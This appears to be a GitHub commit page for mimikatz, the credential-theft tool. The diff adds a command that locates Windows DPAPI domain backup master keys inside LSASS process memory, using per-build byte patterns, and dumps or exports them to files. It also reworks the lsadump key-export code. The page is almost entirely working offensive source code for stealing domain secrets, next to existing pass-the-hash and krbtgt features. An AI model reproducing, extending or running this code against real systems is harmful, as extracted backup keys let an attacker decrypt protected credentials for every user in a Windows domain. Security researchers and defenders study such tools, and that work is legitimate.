DPAPI Backup keys export from memory cache (sekurlsa + WinDBG), WinDB…

…G LSAIso support
dptechma · May 24, 2015 · 45cade5 · 45cade5
1 parent 6270412
commit 45cade5
Show file tree

Hide file tree

Showing 18 changed files with 386 additions and 122 deletions.
diff --git a/mimikatz/modules/kuhl_m_lsadump.c b/mimikatz/modules/kuhl_m_lsadump.c
@@ -1641,80 +1641,88 @@ NTSTATUS kuhl_m_lsadump_LsaRetrievePrivateData(PCWSTR secretName, PUNICODE_STRIN
 	return status;
 }
 
-NTSTATUS kuhl_m_lsadump_getKeyFromGUID(LPCGUID guid, BOOL isExport)
+void kuhl_m_lsadump_analyzeKey(LPCGUID guid, PKIWI_BACKUP_KEY secret, DWORD size, BOOL isExport)
 {
-	NTSTATUS status = STATUS_UNSUCCESSFUL;
-	UNICODE_STRING secret;
-	PKIWI_BACKUP_KEY buffer;
 	HCRYPTPROV hCryptProv;
 	HCRYPTKEY hCryptKey;
 	PVOID data;
 	DWORD len;
+	UNICODE_STRING uString;
+	PWCHAR filename = NULL, shortname;
 
-	wchar_t *filename = NULL, keyName[48+1] = L"G$BCKUPKEY_", *shortname = keyName + 11;
-	keyName[48] = L'\0';
-
-
-	if(NT_SUCCESS(RtlStringFromGUID(guid, &secret)))
+	if(NT_SUCCESS(RtlStringFromGUID(guid, &uString)))
 	{
-		RtlCopyMemory(shortname, secret.Buffer + 1, 36 * sizeof(wchar_t));
-		RtlFreeUnicodeString(&secret);
-
-		status = kuhl_m_lsadump_LsaRetrievePrivateData(keyName, &secret);
-		if(NT_SUCCESS(status))
+		uString.Buffer[uString.Length / sizeof(wchar_t) - 1] = L'\0';
+		shortname = uString.Buffer + 1;
+		switch(secret->version)
 		{
-			buffer = (PKIWI_BACKUP_KEY) secret.Buffer;
-			switch(buffer->version)
+		case 2:
+			kprintf(L"  * RSA key\n");
+			if(CryptAcquireContext(&hCryptProv, NULL, NULL, PROV_RSA_FULL, CRYPT_VERIFYCONTEXT))
 			{
-			case 2:
-				kprintf(L"  * RSA key\n");
-				if(CryptAcquireContext(&hCryptProv, NULL, NULL, PROV_RSA_FULL, CRYPT_VERIFYCONTEXT))
+				if(CryptImportKey(hCryptProv, secret->data,  secret->keyLen, 0, CRYPT_EXPORTABLE, &hCryptKey))
 				{
-					if(CryptImportKey(hCryptProv, buffer->data,  buffer->keyLen, 0, CRYPT_EXPORTABLE, &hCryptKey))
+					kuhl_m_crypto_printKeyInfos(0, hCryptKey);
+					if(isExport)
 					{
-						kuhl_m_crypto_printKeyInfos(0, hCryptKey);
-
-						if(isExport)
-						{
-							kuhl_m_crypto_exportKeyToFile(0, hCryptKey, AT_KEYEXCHANGE, L"ntds", 0, shortname);
-							filename = kuhl_m_crypto_generateFileName(L"ntds", L"capi", 0, shortname, L"der");
-							data = buffer->data + buffer->keyLen;
-							len = buffer->certLen;
-						}
-						CryptDestroyKey(hCryptKey);
+						kuhl_m_crypto_exportKeyToFile(0, hCryptKey, AT_KEYEXCHANGE, L"ntds", 0, shortname);
+						filename = kuhl_m_crypto_generateFileName(L"ntds", L"capi", 0, shortname, L"der");
+						data = secret->data + secret->keyLen;
+						len = secret->certLen;
 					}
-					CryptReleaseContext(hCryptProv, 0);
-				}
-				break;
-			case 1:
-				kprintf(L"  * Legacy key\n");
-				kull_m_string_wprintf_hex((PBYTE) secret.Buffer + sizeof(DWORD), secret.Length - sizeof(DWORD), (32 << 16));
-				kprintf(L"\n");
-				if(isExport)
-				{
-					filename = kuhl_m_crypto_generateFileName(L"ntds", L"legacy", 0, shortname, L"key");
-					data = (PBYTE) secret.Buffer + sizeof(DWORD);
-					len = secret.Length - sizeof(DWORD);
-				}
-				break;
-			default:
-				kprintf(L"  * Unknown key (seen as %08x)\n", buffer->version);
-				kull_m_string_wprintf_hex(secret.Buffer, secret.Length, (32 << 16));
-				kprintf(L"\n");
-				if(isExport)
-				{
-					filename = kuhl_m_crypto_generateFileName(L"ntds", L"unknown", 0, shortname, L"key");
-					data = secret.Buffer;
-					len = secret.Length;
+					CryptDestroyKey(hCryptKey);
 				}
+				CryptReleaseContext(hCryptProv, 0);
 			}
-
-			if(filename && data && len)
+			break;
+		case 1:
+			kprintf(L"  * Legacy key\n");
+			kull_m_string_wprintf_hex((PBYTE) secret + sizeof(DWORD), size - sizeof(DWORD), (32 << 16));
+			kprintf(L"\n");
+			if(isExport)
 			{
-				kprintf(L"\tExport         : %s - \'%s\'\n", kull_m_file_writeData(filename, data, len) ? L"OK" : L"KO", filename);
-				LocalFree(filename);
+				filename = kuhl_m_crypto_generateFileName(L"ntds", L"legacy", 0, shortname, L"key");
+				data = (PBYTE) secret + sizeof(DWORD);
+				len = size - sizeof(DWORD);
+			}
+			break;
+		default:
+			kprintf(L"  * Unknown key (seen as %08x)\n", secret->version);
+			kull_m_string_wprintf_hex(secret, size, (32 << 16));
+			kprintf(L"\n");
+			if(isExport)
+			{
+				filename = kuhl_m_crypto_generateFileName(L"ntds", L"unknown", 0, shortname, L"key");
+				data = secret;
+				len = size;
 			}
+		}
+		if(filename)
+		{
+			if(data && len)
+				kprintf(L"\tExport         : %s - \'%s\'\n", kull_m_file_writeData(filename, data, len) ? L"OK" : L"KO", filename);
+			LocalFree(filename);
+		}
+		RtlFreeUnicodeString(&uString);
+	}
+}
 
+NTSTATUS kuhl_m_lsadump_getKeyFromGUID(LPCGUID guid, BOOL isExport)
+{
+	NTSTATUS status = STATUS_UNSUCCESSFUL;
+	UNICODE_STRING secret;
+	wchar_t keyName[48+1] = L"G$BCKUPKEY_";
+	keyName[48] = L'\0';
+
+	if(NT_SUCCESS(RtlStringFromGUID(guid, &secret)))
+	{
+		RtlCopyMemory(keyName + 11, secret.Buffer + 1, 36 * sizeof(wchar_t));
+		RtlFreeUnicodeString(&secret);
+
+		status = kuhl_m_lsadump_LsaRetrievePrivateData(keyName, &secret);
+		if(NT_SUCCESS(status))
+		{
+			kuhl_m_lsadump_analyzeKey(guid, (PKIWI_BACKUP_KEY) secret.Buffer, secret.Length, isExport);
 			LocalFree(secret.Buffer);
 		}
 		else PRINT_ERROR(L"kuhl_m_lsadump_LsaRetrievePrivateData: 0x%08x\n", status);
@@ -1726,43 +1734,41 @@ NTSTATUS kuhl_m_lsadump_bkey(int argc, wchar_t * argv[])
 {
 	NTSTATUS status;
 	UNICODE_STRING secret;
-	GUID guidPreferredKey, guidW2KPreferredKey;
+	GUID guid;
 	PCWCHAR szGuid = NULL;
 	BOOL export = kull_m_string_args_byName(argc, argv, L"export", NULL, NULL);
 
 	kull_m_string_args_byName(argc, argv, L"guid", &szGuid, NULL);
 	if(szGuid)
 	{
 		RtlInitUnicodeString(&secret, szGuid);
-		status = RtlGUIDFromString(&secret, &guidPreferredKey);
+		status = RtlGUIDFromString(&secret, &guid);
 		if(NT_SUCCESS(status))
 		{
-			kprintf(L"\n"); kull_m_string_displayGUID(&guidPreferredKey); kprintf(L" seems to be a valid GUID\n");
-			kuhl_m_lsadump_getKeyFromGUID(&guidPreferredKey, export);
+			kprintf(L"\n"); kull_m_string_displayGUID(&guid); kprintf(L" seems to be a valid GUID\n");
+			kuhl_m_lsadump_getKeyFromGUID(&guid, export);
 		}
 		else PRINT_ERROR(L"Invalide GUID (0x%08x) ; %s\n", status, szGuid);
 	}
 	else
 	{
-		kprintf(L"\nCurrent prefered key:       "); 
+		kprintf(L"\nCurrent prefered key:       ");
 		status = kuhl_m_lsadump_LsaRetrievePrivateData(L"G$BCKUPKEY_PREFERRED", &secret);
 		if(NT_SUCCESS(status))
 		{
-			guidPreferredKey = *(LPCGUID) secret.Buffer;
+			kull_m_string_displayGUID((LPCGUID) secret.Buffer); kprintf(L"\n");
+			kuhl_m_lsadump_getKeyFromGUID((LPCGUID) secret.Buffer, export);
 			LocalFree(secret.Buffer);
-			kull_m_string_displayGUID(&guidPreferredKey); kprintf(L"\n");
-			kuhl_m_lsadump_getKeyFromGUID(&guidPreferredKey, export);
 		}
 		else PRINT_ERROR(L"kuhl_m_lsadump_LsaRetrievePrivateData: 0x%08x\n", status);
 
 		kprintf(L"\nCompatibility prefered key: ");
 		status = kuhl_m_lsadump_LsaRetrievePrivateData(L"G$BCKUPKEY_P", &secret);
 		if(NT_SUCCESS(status))
 		{
-			guidW2KPreferredKey = *(LPCGUID) secret.Buffer;
+			kull_m_string_displayGUID((LPCGUID) secret.Buffer); kprintf(L"\n");
+			kuhl_m_lsadump_getKeyFromGUID((LPCGUID) secret.Buffer, export);
 			LocalFree(secret.Buffer);
-			kull_m_string_displayGUID(&guidW2KPreferredKey); kprintf(L"\n");
-			kuhl_m_lsadump_getKeyFromGUID(&guidW2KPreferredKey, export);
 		}
 		else PRINT_ERROR(L"kuhl_m_lsadump_LsaRetrievePrivateData: 0x%08x\n", status);
 	}

diff --git a/mimikatz/modules/kuhl_m_lsadump.h b/mimikatz/modules/kuhl_m_lsadump.h
@@ -63,6 +63,7 @@ BOOL kuhl_m_lsadump_lsa_getHandle(PKULL_M_MEMORY_HANDLE * hMemory, DWORD Flags);
 void kuhl_m_lsadump_trust_authinformation(PLSA_AUTH_INFORMATION info, DWORD count, PCWSTR prefix, PCUNICODE_STRING from, PCUNICODE_STRING dest);
 
 NTSTATUS kuhl_m_lsadump_LsaRetrievePrivateData(PCWSTR secretName, PUNICODE_STRING secret);
+void kuhl_m_lsadump_analyzeKey(LPCGUID guid, PKIWI_BACKUP_KEY secret, DWORD size, BOOL isExport);
 NTSTATUS kuhl_m_lsadump_getKeyFromGUID(LPCGUID guid, BOOL isExport);
 
 typedef  enum _DOMAIN_SERVER_ROLE

diff --git a/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c b/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c
@@ -20,7 +20,8 @@ const KUHL_M_C kuhl_m_c_sekurlsa[] = {
 	{kuhl_m_sekurlsa_pth,		L"pth",				L"Pass-the-hash"},
 	{kuhl_m_sekurlsa_krbtgt,	L"krbtgt",			L"krbtgt!"},
 #ifdef _M_X64
-	{kuhl_m_sekurlsa_trust,		L"trust",			L"trust!"},
+	{kuhl_m_sekurlsa_trust,		L"trust",			L"Antisocial"},
+	{kuhl_m_sekurlsa_bkeys,		L"backupkeys",		L"Preferred Backup Master keys"},
 #endif
 	{kuhl_m_sekurlsa_kerberos_tickets,	L"tickets",	L"List Kerberos tickets"},
 	{kuhl_m_sekurlsa_kerberos_keys,		L"ekeys",	L"List Kerberos Encryption Keys"},
@@ -432,7 +433,7 @@ NTSTATUS kuhl_m_sekurlsa_krbtgt(int argc, wchar_t * argv[])
 	{
 		if(kuhl_m_sekurlsa_kdcsvc_package.Module.isPresent)
 		{
-			if(kuhl_m_sekurlsa_utils_search_generic(&cLsass, &kuhl_m_sekurlsa_kdcsvc_package.Module, SecDataReferences, ARRAYSIZE(SecDataReferences), &aLsass.address, NULL, &l))
+			if(kuhl_m_sekurlsa_utils_search_generic(&cLsass, &kuhl_m_sekurlsa_kdcsvc_package.Module, SecDataReferences, ARRAYSIZE(SecDataReferences), &aLsass.address, NULL, NULL, &l))
 			{
 				aLsass.address = (PBYTE) aLsass.address + sizeof(PVOID) * l;
 				if(kull_m_memory_copy(&aLocal, &aLsass, sizeof(DUAL_KRBTGT)))
@@ -540,7 +541,7 @@ NTSTATUS kuhl_m_sekurlsa_trust(int argc, wchar_t * argv[])
 		{
 			if(kuhl_m_sekurlsa_kdcsvc_package.Module.isPresent)
 			{
-				if(kuhl_m_sekurlsa_utils_search_generic(&cLsass, &kuhl_m_sekurlsa_kdcsvc_package.Module, DomainListReferences, ARRAYSIZE(DomainListReferences), &aLsass.address, NULL, NULL))
+				if(kuhl_m_sekurlsa_utils_search_generic(&cLsass, &kuhl_m_sekurlsa_kdcsvc_package.Module, DomainListReferences, ARRAYSIZE(DomainListReferences), &aLsass.address, NULL, NULL, NULL))
 				{
 					if(kull_m_memory_copy(&data, &aLsass, sizeof(PVOID)))
 					{
@@ -628,6 +629,88 @@ void kuhl_m_sekurlsa_trust_domaininfo(struct _KDC_DOMAIN_INFO * info)
 		LocalFree(info->FullDomainName.Buffer);
 	}
 }
+
+void kuhl_m_sekurlsa_bkey(PKUHL_M_SEKURLSA_CONTEXT cLsass, PKUHL_M_SEKURLSA_LIB pLib, PKULL_M_PATCH_GENERIC generics, SIZE_T cbGenerics, BOOL isExport)
+{
+	KULL_M_MEMORY_HANDLE  hBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL};
+	KULL_M_MEMORY_ADDRESS aLsass = {NULL, cLsass->hLsassMem}, aData = {NULL, &hBuffer};
+	GUID guid;
+	DWORD cb;
+	PVOID pGuid, pKeyLen, pKeyBuffer;
+
+	if(kuhl_m_sekurlsa_utils_search_generic(cLsass, pLib, generics, cbGenerics, &pGuid, &pKeyLen, &pKeyBuffer, NULL))
+	{
+		if(aLsass.address = pGuid)
+		{
+			aData.address = &guid;
+			if(kull_m_memory_copy(&aData, &aLsass, sizeof(GUID)))
+			{
+				kull_m_string_displayGUID(&guid); kprintf(L"\n");
+				if(aLsass.address = pKeyLen)
+				{
+					aData.address = &cb;
+					if(kull_m_memory_copy(&aData, &aLsass, sizeof(DWORD)))
+					{
+						if(cb && (aLsass.address = pKeyBuffer))
+						{
+							aData.address = &aLsass.address;
+							if(kull_m_memory_copy(&aData, &aLsass, sizeof(PVOID)))
+							{
+								if(aData.address = LocalAlloc(LPTR, cb))
+								{
+									if(kull_m_memory_copy(&aData, &aLsass, cb))
+									{
+										kuhl_m_lsadump_analyzeKey(&guid, (PKIWI_BACKUP_KEY) aData.address, cb, isExport);
+									}
+									LocalFree(aData.address);
+								}
+							}
+						}
+					}
+				}
+			}
+		}
+	}
+}
+
+BYTE PTRN_WALL_BackupKey[]			= {0xb9, 0x02, 0x00, 0x00, 0x00, 0x89, 0x05};
+KULL_M_PATCH_GENERIC BackupKeyReferences[] = {
+	{KULL_M_WIN_BUILD_2K3,	{sizeof(PTRN_WALL_BackupKey),			PTRN_WALL_BackupKey},			{0, NULL}, {-4,  37,  44}},
+	{KULL_M_WIN_BUILD_VISTA,{sizeof(PTRN_WALL_BackupKey),			PTRN_WALL_BackupKey},			{0, NULL}, {-4,  40,  47}},
+	{KULL_M_WIN_BUILD_7,	{sizeof(PTRN_WALL_BackupKey),			PTRN_WALL_BackupKey},			{0, NULL}, {-4,  33,  40}},
+	{KULL_M_WIN_BUILD_8,	{sizeof(PTRN_WALL_BackupKey),			PTRN_WALL_BackupKey},			{0, NULL}, {-4,  30,  37}},
+};
+BYTE PTRN_W2K3_BackupKeyCompat[]	= {0x45, 0x33, 0xc9, 0x48, 0xc7, 0x44, 0x24, 0x20, 0x00, 0x00, 0x00, 0x00, 0xe8};
+BYTE PTRN_W2K8_BackupKeyCompat[]	= {0xb9, 0x01, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xd7, 0xe8};
+BYTE PTRN_W2K8R2_BackupKeyCompat[]	= {0xb9, 0x01, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xd6, 0xe8};
+BYTE PTRN_W2K12_BackupKeyCompat[]	= {0x85, 0xc0, 0x74, 0x21, 0x4c, 0x8d, 0x05};
+BYTE PTRN_W2K12R2_BackupKeyCompat[]	= {0xb9, 0x01, 0x00, 0x00, 0x00, 0xe8};
+KULL_M_PATCH_GENERIC BackupKeyReferencesCompat[] = {
+	{KULL_M_WIN_BUILD_2K3,	{sizeof(PTRN_W2K3_BackupKeyCompat),		PTRN_W2K3_BackupKeyCompat},		{0, NULL}, {-4, -18, -11}},
+	{KULL_M_WIN_BUILD_VISTA,{sizeof(PTRN_W2K8_BackupKeyCompat),		PTRN_W2K8_BackupKeyCompat},		{0, NULL}, {-4,  26,  33}},
+	{KULL_M_WIN_BUILD_7,	{sizeof(PTRN_W2K8R2_BackupKeyCompat),	PTRN_W2K8R2_BackupKeyCompat},	{0, NULL}, {-4,  20,  27}},
+	{KULL_M_WIN_BUILD_8,	{sizeof(PTRN_W2K12_BackupKeyCompat),	PTRN_W2K12_BackupKeyCompat},	{0, NULL}, {21,   7,  14}},
+	{KULL_M_WIN_BUILD_BLUE,	{sizeof(PTRN_W2K12R2_BackupKeyCompat),	PTRN_W2K12R2_BackupKeyCompat},	{0, NULL}, {-4,  17,  24}},
+};
+NTSTATUS kuhl_m_sekurlsa_bkeys(int argc, wchar_t * argv[])
+{
+	NTSTATUS status = kuhl_m_sekurlsa_acquireLSA();
+	PKUHL_M_SEKURLSA_LIB pLib;
+	BOOL export = kull_m_string_args_byName(argc, argv, L"export", NULL, NULL);
+
+	if(NT_SUCCESS(status))
+	{
+		pLib = (cLsass.osContext.BuildNumber >= KULL_M_WIN_MIN_BUILD_8) ? &kuhl_m_sekurlsa_dpapi_svc_package.Module : &kuhl_m_sekurlsa_dpapi_lsa_package.Module;
+		if(pLib->isPresent)
+		{
+			kprintf(L"\nCurrent prefered key:       ");
+			kuhl_m_sekurlsa_bkey(&cLsass, pLib, BackupKeyReferences, ARRAYSIZE(BackupKeyReferences), export);
+			kprintf(L"\nCompatibility prefered key: ");
+			kuhl_m_sekurlsa_bkey(&cLsass, pLib, BackupKeyReferencesCompat, ARRAYSIZE(BackupKeyReferencesCompat), export);
+		}
+	}
+	return status;
+}
 #endif
 
 NTSTATUS kuhl_m_sekurlsa_pth(int argc, wchar_t * argv[])

diff --git a/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.h b/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.h
@@ -24,6 +24,7 @@
 #include "packages/kuhl_m_sekurlsa_credman.h"
 
 #include "../kerberos/kuhl_m_kerberos_ticket.h"
+#include "../kuhl_m_lsadump.h"
 
 #define KUHL_SEKURLSA_CREDS_DISPLAY_RAW				0x00000000
 #define KUHL_SEKURLSA_CREDS_DISPLAY_LINE			0x00000001
@@ -64,13 +65,15 @@ BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_logondata(IN PKIWI_BASIC_SECURITY_LO
 VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCreds, PLUID luid, ULONG flags);
 VOID kuhl_m_sekurlsa_genericKeyOutput(struct _MARSHALL_KEY * key, PVOID * dirtyBase);
 VOID kuhl_m_sekurlsa_genericLsaIsoOutput(struct _LSAISO_DATA_BLOB * blob);
+void kuhl_m_sekurlsa_bkey(PKUHL_M_SEKURLSA_CONTEXT cLsass, PKUHL_M_SEKURLSA_LIB pLib, PKULL_M_PATCH_GENERIC generics, SIZE_T cbGenerics, BOOL isExport);
 void kuhl_m_sekurlsa_krbtgt_keys(PVOID addr, PCWSTR prefix);
 void kuhl_m_sekurlsa_trust_domainkeys(struct _KDC_DOMAIN_KEYS_INFO * keysInfo, PCWSTR prefix, BOOL incoming, PCUNICODE_STRING domain);
 void kuhl_m_sekurlsa_trust_domaininfo(struct _KDC_DOMAIN_INFO * info);
 
 NTSTATUS kuhl_m_sekurlsa_all(int argc, wchar_t * argv[]);
 NTSTATUS kuhl_m_sekurlsa_krbtgt(int argc, wchar_t * argv[]);
 NTSTATUS kuhl_m_sekurlsa_trust(int argc, wchar_t * argv[]);
+NTSTATUS kuhl_m_sekurlsa_bkeys(int argc, wchar_t * argv[]);
 NTSTATUS kuhl_m_sekurlsa_pth(int argc, wchar_t * argv[]);
 NTSTATUS kuhl_m_sekurlsa_process(int argc, wchar_t * argv[]);
 NTSTATUS kuhl_m_sekurlsa_minidump(int argc, wchar_t * argv[]);

diff --git a/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_utils.c b/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_utils.c
@@ -41,10 +41,10 @@ BOOL kuhl_m_sekurlsa_utils_search(PKUHL_M_SEKURLSA_CONTEXT cLsass, PKUHL_M_SEKUR
 #ifdef _M_X64
 	LsaSrvReferences[4].Offsets.off1 = (pLib->Informations.TimeDateStamp > 0x53480000) ? -54 : -61; // 6.2 post or pre KB
 #endif
-	return kuhl_m_sekurlsa_utils_search_generic(cLsass, pLib, LsaSrvReferences,  ARRAYSIZE(LsaSrvReferences), (PVOID *) &LogonSessionList, pLogonSessionListCount, NULL);
+	return kuhl_m_sekurlsa_utils_search_generic(cLsass, pLib, LsaSrvReferences,  ARRAYSIZE(LsaSrvReferences), (PVOID *) &LogonSessionList, pLogonSessionListCount, NULL, NULL);
 }
 
-BOOL kuhl_m_sekurlsa_utils_search_generic(PKUHL_M_SEKURLSA_CONTEXT cLsass, PKUHL_M_SEKURLSA_LIB pLib, PKULL_M_PATCH_GENERIC generics, SIZE_T cbGenerics, PVOID * genericPtr, PVOID * genericPtr1, PLONG genericOffset1)
+BOOL kuhl_m_sekurlsa_utils_search_generic(PKUHL_M_SEKURLSA_CONTEXT cLsass, PKUHL_M_SEKURLSA_LIB pLib, PKULL_M_PATCH_GENERIC generics, SIZE_T cbGenerics, PVOID * genericPtr, PVOID * genericPtr1, PVOID * genericPtr2, PLONG genericOffset1)
 {
 	KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
 	KULL_M_MEMORY_ADDRESS aLsassMemory = {NULL, cLsass->hLsassMem}, aLocalMemory = {NULL, &hLocalMemory};
@@ -83,6 +83,19 @@ BOOL kuhl_m_sekurlsa_utils_search_generic(PKUHL_M_SEKURLSA_CONTEXT cLsass, PKUHL
 				pLib->isInit = kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(PVOID));
 			#endif
 			}
+
+			if(genericPtr2)
+			{
+				aLsassMemory.address = (PBYTE) sMemory.result + currentReference->Offsets.off2;
+			#ifdef _M_X64
+				aLocalMemory.address = &offset;
+				if(pLib->isInit = kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(LONG)))
+					*genericPtr2 = ((PBYTE) aLsassMemory.address + sizeof(LONG) + offset);
+			#elif defined _M_IX86
+				aLocalMemory.address = genericPtr2;
+				pLib->isInit = kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(PVOID));
+			#endif
+			}
 		}
 	}
 	return pLib->isInit;

diff --git a/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_utils.h b/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_utils.h
@@ -16,7 +16,7 @@ PVOID kuhl_m_sekurlsa_utils_pFromAVLByLuid(PKULL_M_MEMORY_ADDRESS pTable, ULONG
 PVOID kuhl_m_sekurlsa_utils_pFromAVLByLuidRec(PKULL_M_MEMORY_ADDRESS pTable, ULONG LUIDoffset, PLUID luidToFind);
 
 BOOL kuhl_m_sekurlsa_utils_search(PKUHL_M_SEKURLSA_CONTEXT cLsass, PKUHL_M_SEKURLSA_LIB pLib);
-BOOL kuhl_m_sekurlsa_utils_search_generic(PKUHL_M_SEKURLSA_CONTEXT cLsass, PKUHL_M_SEKURLSA_LIB pLib, PKULL_M_PATCH_GENERIC generics, SIZE_T cbGenerics, PVOID * genericPtr, PVOID * genericPtr1, PLONG genericOffset1);
+BOOL kuhl_m_sekurlsa_utils_search_generic(PKUHL_M_SEKURLSA_CONTEXT cLsass, PKUHL_M_SEKURLSA_LIB pLib, PKULL_M_PATCH_GENERIC generics, SIZE_T cbGenerics, PVOID * genericPtr, PVOID * genericPtr1, PVOID * genericPtr2, PLONG genericOffset1);
 
 void kuhl_m_sekurlsa_utils_NlpMakeRelativeOrAbsoluteString(PVOID BaseAddress, PLSA_UNICODE_STRING String, BOOL relative);
 BOOL kuhl_m_sekurlsa_utils_getSid(IN PSID * pSid, IN PKULL_M_MEMORY_HANDLE source);

diff --git a/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_dpapi.c b/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_dpapi.c
@@ -53,7 +53,7 @@ BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_dpapi(IN PKIWI_BASIC_SECURITY_LOGON_
 	if(pData->LogonType != Network)
 	{
 		kuhl_m_sekurlsa_printinfos_logonData(pData);
-		if(pPackage->Module.isInit || kuhl_m_sekurlsa_utils_search_generic(pData->cLsass, &pPackage->Module, MasterKeyCacheReferences, ARRAYSIZE(MasterKeyCacheReferences), (PVOID *) &pMasterKeyCacheList, NULL, NULL))
+		if(pPackage->Module.isInit || kuhl_m_sekurlsa_utils_search_generic(pData->cLsass, &pPackage->Module, MasterKeyCacheReferences, ARRAYSIZE(MasterKeyCacheReferences), (PVOID *) &pMasterKeyCacheList, NULL, NULL, NULL))
 		{
 			aLsass.address = pMasterKeyCacheList;
 			if(kull_m_memory_copy(&aBuffer, &aLsass, sizeof(LIST_ENTRY)))